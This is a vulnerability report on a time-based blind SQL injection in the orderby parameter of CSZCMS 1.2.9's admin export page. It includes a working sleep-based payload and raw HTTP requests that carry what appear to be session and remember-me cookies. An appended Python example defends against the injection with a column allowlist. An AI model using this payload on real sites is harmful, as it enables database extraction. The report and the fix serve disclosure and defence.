Description:
I found a Blind SQL Injection vulnerability in your CMS (version 1.2.9) "export" page. It refers to an injection attack where an attacker can execute malicious SQL statements that control a web application's database server.
The "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject a Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in the "orderby" parameter. Your request data will be
CMS Version:
1.2.9
Affected URL:
http://127.0.0.1/admin/export
Steps to Reproduce:
GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=article_db_id&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: _ga=GA1.1.2106075763.1616578884; _pk_id.39.dc78=a6fc2902298b2ea4.1616578885.2.1616584112.1616584112.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1
GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: _ga=GA1.1.2106075763.1616578884; _pk_id.39.dc78=a6fc2902298b2ea4.1616578885.2.1616584112.1616584112.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1
Proof of Concept:
You can see the Proof of Concept in the video I've attached to confirm the vulnerability.
Blind.SQL.Injection.mp4
Impact:
An attacker could extract information from the database.
Let me know if any further info is required.
Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
BugsBD Limited
https://www.linkedin.com/in/rahadchowdhury/
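A defensive counterpart to the report above, added here as an example and not part of the issue or of CSZCMS's own code: the export parameters (fieldS[], orderby, sort) are accepted only when they match a fixed column allowlist, since identifiers cannot be bound as prepared-statement parameters. The table-to-column map and the two request lines are constructed stand-ins modelled on the requests in the report; the orderby payload from the second request is rejected before any SQL is built.

```python
from urllib.parse import parse_qs, urlsplit

# Assumed table -> exportable columns map (constructed for this example;
# the real CSZCMS schema is not on the page).
EXPORTABLE_COLUMNS = {
    "article_db": {"article_db_id", "title", "created_at"},
}
SORT_DIRECTIONS = {"ASC", "DESC"}


def build_export_query(table, fields, orderby, sort):
    """Build the export SELECT from allowlisted identifiers only: each name
    must match a known column exactly, anything else raises ValueError."""
    allowed = EXPORTABLE_COLUMNS.get(table)
    if allowed is None:
        raise ValueError(f"unknown table: {table!r}")
    if not fields or any(f not in allowed for f in fields):
        raise ValueError(f"unknown field in {fields!r}")
    if orderby not in allowed:
        raise ValueError(f"unknown orderby column: {orderby!r}")
    direction = sort.upper()
    if direction not in SORT_DIRECTIONS:
        raise ValueError(f"unknown sort direction: {sort!r}")
    cols = ", ".join(f"`{f}`" for f in fields)
    return f"SELECT {cols} FROM `{table}` ORDER BY `{orderby}` {direction}"


def query_from_request_line(request_line):
    """Parse 'GET /.../getcsv/<table>?... HTTP/1.1' and build its query."""
    target = urlsplit(request_line.split(" ")[1])
    table = target.path.rstrip("/").rsplit("/", 1)[-1]
    qs = parse_qs(target.query)  # decodes fieldS%5B%5D -> 'fieldS[]'
    return build_export_query(table, qs.get("fieldS[]", []),
                              qs.get("orderby", [""])[0], qs.get("sort", ["ASC"])[0])


def is_accepted(request_line):
    """True if the request would reach the database, False if it is rejected."""
    try:
        query_from_request_line(request_line)
        return True
    except ValueError:
        return False


# Constructed request lines mirroring the two requests in the report.
BENIGN = ("GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id"
          "&orderby=article_db_id&sort=ASC HTTP/1.1")
INJECTED = ("GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id"
            "&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC HTTP/1.1")
```

Because the check is an exact match against known names, a time-based payload never reaches the query builder, so there is no delay to observe and no ORDER BY expression to evaluate.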